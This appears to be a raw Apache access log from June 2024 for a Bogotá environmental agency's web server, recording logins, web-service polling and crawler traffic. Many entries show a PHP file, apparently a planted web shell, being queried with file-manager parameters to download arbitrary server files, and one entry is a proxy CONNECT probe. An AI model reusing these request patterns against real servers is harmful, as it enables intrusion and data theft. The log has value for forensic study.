181.53.12.168 - - [16/Jun/2024:20:55:31 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.12.168 - - [16/Jun/2024:20:55:31 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12411
181.53.12.168 - - [16/Jun/2024:20:55:31 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 304 -
181.53.12.168 - - [16/Jun/2024:20:55:31 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 304 -
181.53.12.168 - - [16/Jun/2024:20:55:31 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 304 -
181.53.12.168 - - [16/Jun/2024:20:55:31 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [16/Jun/2024:20:55:31 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.12.168 - - [16/Jun/2024:20:55:31 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 304 -
181.53.12.168 - - [16/Jun/2024:20:55:31 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [16/Jun/2024:20:55:31 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [16/Jun/2024:20:55:31 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [16/Jun/2024:20:55:31 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [16/Jun/2024:20:55:31 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [16/Jun/2024:20:55:31 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 304 -
181.53.12.168 - - [16/Jun/2024:20:55:31 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 304 -
181.53.12.168 - - [16/Jun/2024:20:55:31 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
181.53.12.168 - - [16/Jun/2024:20:55:34 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 2216
181.53.12.168 - - [16/Jun/2024:20:55:34 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [16/Jun/2024:20:55:35 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 16471
181.53.12.168 - - [16/Jun/2024:20:55:35 -0500] "GET /sipse/css/custom_css_sg_prime.css HTTP/1.1" 304 -
181.53.12.168 - - [16/Jun/2024:20:55:35 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.12.168 - - [16/Jun/2024:20:55:35 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [16/Jun/2024:20:55:35 -0500] "GET /sipse/js/jquery.min.js HTTP/1.1" 304 -
181.53.12.168 - - [16/Jun/2024:20:55:35 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [16/Jun/2024:20:55:35 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [16/Jun/2024:20:55:35 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [16/Jun/2024:20:55:35 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [16/Jun/2024:20:55:35 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [16/Jun/2024:20:55:35 -0500] "GET /sipse/css/v_mergente.css HTTP/1.1" 304 -
181.53.12.168 - - [16/Jun/2024:20:55:35 -0500] "GET /sipse/imagenes/cargando.gif HTTP/1.1" 304 -
181.53.12.168 - - [16/Jun/2024:20:55:35 -0500] "GET /sipse/imagenes/logoAplicacion.jpg HTTP/1.1" 304 -
181.53.12.168 - - [16/Jun/2024:20:55:35 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
181.53.12.168 - - [16/Jun/2024:20:55:38 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
181.53.12.168 - - [16/Jun/2024:20:55:38 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 2073
181.53.12.168 - - [16/Jun/2024:20:55:39 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 39106
181.53.12.168 - - [16/Jun/2024:20:55:40 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [16/Jun/2024:20:55:40 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [16/Jun/2024:20:55:40 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.12.168 - - [16/Jun/2024:20:55:40 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [16/Jun/2024:20:55:40 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [16/Jun/2024:20:55:40 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [16/Jun/2024:20:55:40 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [16/Jun/2024:20:55:50 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12861
47.128.57.167 - - [16/Jun/2024:20:55:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-includes%5C&f=class-feed.php&ft=download&white=1 HTTP/1.1" 200 3932
181.53.12.168 - - [16/Jun/2024:20:55:53 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 117535
181.53.12.168 - - [16/Jun/2024:20:55:53 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.12.168 - - [16/Jun/2024:20:55:53 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [16/Jun/2024:20:55:53 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [16/Jun/2024:20:55:53 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [16/Jun/2024:20:55:53 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [16/Jun/2024:20:55:53 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [16/Jun/2024:20:55:53 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [16/Jun/2024:20:55:53 -0500] "GET /sipse/faces/javax.faces.resource/dynamiccontent.properties?ln=primefaces&pfdrid=XjOR5%2F%2FfPAZAuY9TpWQeCiM0BhlXxYRBGKi%2FQcXXfeA%3D&pfdrid_c=false HTTP/1.1" 500 383
181.53.12.168 - - [16/Jun/2024:20:55:59 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 1267254
172.22.2.4 - - [16/Jun/2024:20:54:26 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
201.245.192.253 - - [16/Jun/2024:20:56:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.98.128 - - [16/Jun/2024:20:56:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+1551-1600&f=00001558.tif&ft=download HTTP/1.1" 200 137258
47.128.110.11 - - [16/Jun/2024:20:57:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=5986.pdf&ft=download HTTP/1.1" 200 20135
201.245.192.253 - - [16/Jun/2024:20:57:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.122.98 - - [16/Jun/2024:20:57:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=3958.pdf&ft=download HTTP/1.1" 200 413351
201.245.192.253 - - [16/Jun/2024:20:58:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.17.171 - - [16/Jun/2024:20:58:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2191.pdf&ft=download HTTP/1.1" 200 466599
114.119.135.143 - - [16/Jun/2024:20:58:59 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones/DISCIPLINARIOS%2B2019/&sort=size&order=desc HTTP/1.1" 200 14379
216.245.221.92 - - [16/Jun/2024:20:59:02 -0500] "HEAD / HTTP/1.1" 200 -
156.59.198.135 - - [16/Jun/2024:20:59:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_sess_p13qmk2qgrl5h7kg9tgcm91k83 HTTP/1.0" 200 1034
201.245.192.253 - - [16/Jun/2024:20:59:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2024:20:59:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
47.128.123.38 - - [16/Jun/2024:21:00:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+1751-1800&f=00001757.tif&ft=download HTTP/1.1" 200 162654
201.245.192.253 - - [16/Jun/2024:21:00:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.56.166 - - [16/Jun/2024:21:00:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=0290.pdf&ft=download HTTP/1.1" 200 339623
172.22.2.4 - - [16/Jun/2024:20:59:25 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2024:21:01:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.40.235 - - [16/Jun/2024:21:01:24 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4068.pdf&ft=download&white=1 HTTP/1.1" 200 396967
172.22.2.4 - - [16/Jun/2024:21:00:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
47.128.44.250 - - [16/Jun/2024:21:02:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2000&f=2000+2500-2549.tif&ft=download HTTP/1.1" 200 4628124
201.245.192.253 - - [16/Jun/2024:21:02:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.44.31 - - [16/Jun/2024:21:02:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2024&f=00684.pdf&ft=download HTTP/1.1" 200 478886
172.22.2.4 - - [16/Jun/2024:21:03:15 -0500] "GET /BLA/boletinlegal/jurisprudencia.php HTTP/1.1" 200 17637
207.46.13.130 - - [16/Jun/2024:21:03:15 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12733
201.245.192.253 - - [16/Jun/2024:21:03:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.17.211 - - [16/Jun/2024:21:03:28 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+1251-1300&f=00001265.tif&ft=download HTTP/1.1" 200 100804
172.22.2.4 - - [16/Jun/2024:21:03:54 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
216.245.221.92 - - [16/Jun/2024:21:04:02 -0500] "HEAD / HTTP/1.1" 200 -
47.128.112.246 - - [16/Jun/2024:21:04:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-admin%5C&f=link-add.php&ft=download&white=1 HTTP/1.1" 200 712
201.245.192.253 - - [16/Jun/2024:21:04:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2024:21:04:28 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
47.128.56.99 - - [16/Jun/2024:21:04:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cvideos&f=NuestraGente_Conociendoelparaiso.flv&ft=download HTTP/1.1" 200 59170441
66.249.66.20 - - [16/Jun/2024:21:05:07 -0500] "GET /autoliquidacion2020/Cobro%20Evaluacion%20Certificaci%C3%B3n%20Para%20La%20Deducci%C3%B3n%20Por%20Inversi%C3%B3n%20En%20Medio%20Ambiente/Acreditaci%C3%B3n%20o%20Certificaci%C3%B3n%20de%20Inversi%C3%B3n%20Ambiental.pdf HTTP/1.1" 200 36802
201.245.192.253 - - [16/Jun/2024:21:05:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.47.106 - - [16/Jun/2024:21:05:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1782.pdf&ft=download&white=1 HTTP/1.1" 200 470695
156.59.198.135 - - [16/Jun/2024:21:06:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_sess_03rhks3hmv1987fdko5okudrp1 HTTP/1.0" 200 1034
201.245.192.253 - - [16/Jun/2024:21:06:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [16/Jun/2024:21:05:15 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.41.149 - - [16/Jun/2024:21:06:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=3863.pdf&ft=download&white=1 HTTP/1.1" 200 356007
201.245.192.253 - - [16/Jun/2024:21:07:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.96.216 - - [16/Jun/2024:21:07:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2867.pdf&ft=download&white=1 HTTP/1.1" 200 1466022
172.22.2.4 - - [16/Jun/2024:21:06:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
181.63.25.20 - - [16/Jun/2024:21:07:55 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 16321
181.63.25.20 - - [16/Jun/2024:21:07:55 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:21:07:55 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:21:07:55 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:21:07:55 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:21:07:55 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:21:07:55 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:21:07:55 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:21:07:55 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
181.63.25.20 - - [16/Jun/2024:21:07:55 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
47.128.96.224 - - [16/Jun/2024:21:08:17 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1498.pdf&ft=download&white=1 HTTP/1.1" 200 20135
201.245.192.253 - - [16/Jun/2024:21:08:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.96.250 - - [16/Jun/2024:21:08:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ckmz&f=vallas_otorgadas_junio2015.kmz&ft=download HTTP/1.1" 200 111849
216.245.221.92 - - [16/Jun/2024:21:09:02 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2024:21:09:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2024:21:09:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
47.128.96.240 - - [16/Jun/2024:21:09:40 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+1251-1300&f=00001251.tif&ft=download HTTP/1.1" 200 126644
40.77.167.48 - - [16/Jun/2024:21:09:58 -0500] "GET /concentracion-de-material-particulado-disminuye-y-secretaria-de-ambiente-levanta-alerta-fase-i-por-calidad-del-aire.html HTTP/1.1" 200 927
201.245.192.253 - - [16/Jun/2024:21:10:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.48.66 - - [16/Jun/2024:21:10:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1563.pdf&ft=download HTTP/1.1" 200 20135
141.98.11.79 - - [16/Jun/2024:21:10:58 -0500] "CONNECT google.com:443 HTTP/1.1" 405 938
40.77.167.26 - - [16/Jun/2024:21:11:03 -0500] "GET /Publicaciones/2024EE96130.pdf HTTP/1.1" 404 227
47.128.48.62 - - [16/Jun/2024:21:11:03 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=6375.pdf&ft=download&white=1 HTTP/1.1" 200 413351
201.245.192.253 - - [16/Jun/2024:21:11:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.49.120 - - [16/Jun/2024:21:11:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4033.pdf&ft=download HTTP/1.1" 200 405159
201.245.192.253 - - [16/Jun/2024:21:12:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.127.192 - - [16/Jun/2024:21:12:26 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5Cschema&f=Svg_Relation_Schema.class.php&ft=download HTTP/1.1" 200 25456
172.22.2.4 - - [16/Jun/2024:21:11:05 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.48.64 - - [16/Jun/2024:21:13:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=5987.pdf&ft=download&white=1 HTTP/1.1" 200 356007
201.245.192.253 - - [16/Jun/2024:21:13:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [16/Jun/2024:21:11:56 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52358
47.128.37.43 - - [16/Jun/2024:21:13:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+2001-2050&f=00002017.tif&ft=download HTTP/1.1" 200 20131
216.245.221.92 - - [16/Jun/2024:21:14:02 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2024:21:14:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2024:21:14:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
69.63.184.6 - - [16/Jun/2024:21:14:28 -0500] "GET /ciudadanos-y-empresas-participaron-en-la-semana-ecoempresarial-2021.html HTTP/1.1" 200 870
69.63.184.8 - - [16/Jun/2024:21:14:28 -0500] "GET /ciudadanos-y-empresas-participaron-en-la-semana-ecoempresarial-2021.html HTTP/1.1" 200 870
173.252.79.6 - - [16/Jun/2024:21:14:29 -0500] "GET /images/semana-ecoempresarial-atencion-bogota-ciudad-27-nov.jpg HTTP/1.1" 200 37494
47.128.37.214 - - [16/Jun/2024:21:14:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Ctmp&f=php2680.tmp&ft=download HTTP/1.1" 200 179875
173.252.83.9 - - [16/Jun/2024:21:14:37 -0500] "GET /con-participacion-bogota-avanza-en-la-construccion-de-la-politica-publica-de-accion-climatica-2050.html HTTP/1.1" 200 806
173.252.107.14 - - [16/Jun/2024:21:14:47 -0500] "GET /ciudadanos-y-empresas-participaron-en-la-semana-ecoempresarial-2021.html HTTP/1.1" 200 870
47.128.29.86 - - [16/Jun/2024:21:15:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CCaja+Herramientas+PIGA&f=index.php&ft=download HTTP/1.1" 200 5281
201.245.192.253 - - [16/Jun/2024:21:15:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.29.81 - - [16/Jun/2024:21:15:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5C&f=install.res.2052.dll&ft=img&white=1 HTTP/1.1" 200 75792
201.245.192.253 - - [16/Jun/2024:21:16:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.45.16 - - [16/Jun/2024:21:16:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes%5Cjs%5C&f=wplink.min.js&ft=download HTTP/1.1" 200 10254
47.128.111.10 - - [16/Jun/2024:21:17:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=6797.pdf&ft=download&white=1 HTTP/1.1" 200 351911
201.245.192.253 - - [16/Jun/2024:21:17:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.21 - - [16/Jun/2024:21:17:27 -0500] "GET /BLA/resoluciones/AUTOS%202023/2259.pdf HTTP/1.1" 200 432412
201.245.192.253 - - [16/Jun/2024:21:17:54 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34550
201.245.192.253 - - [16/Jun/2024:21:16:54 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 14506
47.128.117.145 - - [16/Jun/2024:21:17:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=3270.pdf&ft=download&white=1 HTTP/1.1" 200 384679
216.244.66.195 - - [16/Jun/2024:21:18:01 -0500] "GET /BLA/resoluciones/AUTOS%202016/3086.pdf HTTP/1.1" 200 353607
201.245.192.253 - - [16/Jun/2024:21:18:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [16/Jun/2024:21:16:55 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.111.128 - - [16/Jun/2024:21:18:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4591.pdf&ft=download&white=1 HTTP/1.1" 200 360103
201.245.192.253 - - [16/Jun/2024:21:18:53 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34404
216.245.221.92 - - [16/Jun/2024:21:19:02 -0500] "HEAD / HTTP/1.1" 200 -
47.128.17.187 - - [16/Jun/2024:21:19:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-admin%5C&f=edit.php&ft=download&white=1 HTTP/1.1" 200 14794
201.245.192.253 - - [16/Jun/2024:21:19:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [16/Jun/2024:21:17:46 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
201.245.192.253 - - [16/Jun/2024:21:19:24 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
201.245.192.253 - - [16/Jun/2024:21:19:38 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34550
216.244.66.195 - - [16/Jun/2024:21:20:00 -0500] "GET /BLA/resoluciones/AUTOS%202010/3238.pdf HTTP/1.1" 200 136631
47.128.25.221 - - [16/Jun/2024:21:20:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=5885.pdf&ft=download&white=1 HTTP/1.1" 200 97959
201.245.192.253 - - [16/Jun/2024:21:20:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [16/Jun/2024:21:20:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0743.pdf HTTP/1.1" 200 250617
47.128.115.209 - - [16/Jun/2024:21:20:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5C&f=eula.2052.txt&ft=download HTTP/1.1" 200 17734
216.244.66.195 - - [16/Jun/2024:21:21:06 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2093.pdf HTTP/1.1" 200 288032
201.245.192.253 - - [16/Jun/2024:21:21:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
